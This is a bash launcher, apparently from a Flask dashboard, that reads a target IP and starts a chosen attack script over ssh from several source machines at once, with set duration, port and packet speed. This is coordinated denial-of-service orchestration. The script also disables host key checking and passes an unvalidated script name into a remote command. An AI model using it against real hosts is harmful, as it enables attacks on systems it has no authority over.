#!/bin/bash
# This script is ran from the docker container running flask. /ips is mounted from /home/admin/ips
# Called in /dashboard/flask/app/api/resources.Start:post

ATTACK_SCRIPT=$1
echo "Attack script: $ATTACK_SCRIPT"

[ ! -f /ips/"$2" ] && echo "Cannot find target IP for $2" && exit 1

TARGET_IP=$(cat /ips/"$2")
echo "Target IP: $TARGET_IP"

if [[ $3 ]] && [[ $3 -eq $3 ]] && [[ $3 -le 300 ]] && [[ $3 -ge 1 ]]
then
	DURATION=$3
else
	echo "Invalid duration." && exit 1
fi
echo "Duration: $DURATION"

if [[ $4 ]] && [[ $4 -eq $4 ]] && [[ $4 -le 65535 ]] && [[ $4 -ge 1 ]]
then
	PORT=$4
else
	echo "Invalid port." && exit 1
fi
echo "Port: $PORT"

if [ -z "$5" ]
  then
    echo "No packet speed provided."
    exit 1;
  else
    SPEED=$5
fi
echo "Speed: $SPEED"

( IFS=:
	for NODE in $SOURCE_IPS; do
			echo "Starting script on source machine $NODE"
			ssh -o StrictHostKeyChecking=no admin@$NODE "timeout ${DURATION}s $ATTACK_SCRIPT $TARGET_IP $DURATION $PORT $SPEED" &
	done
)

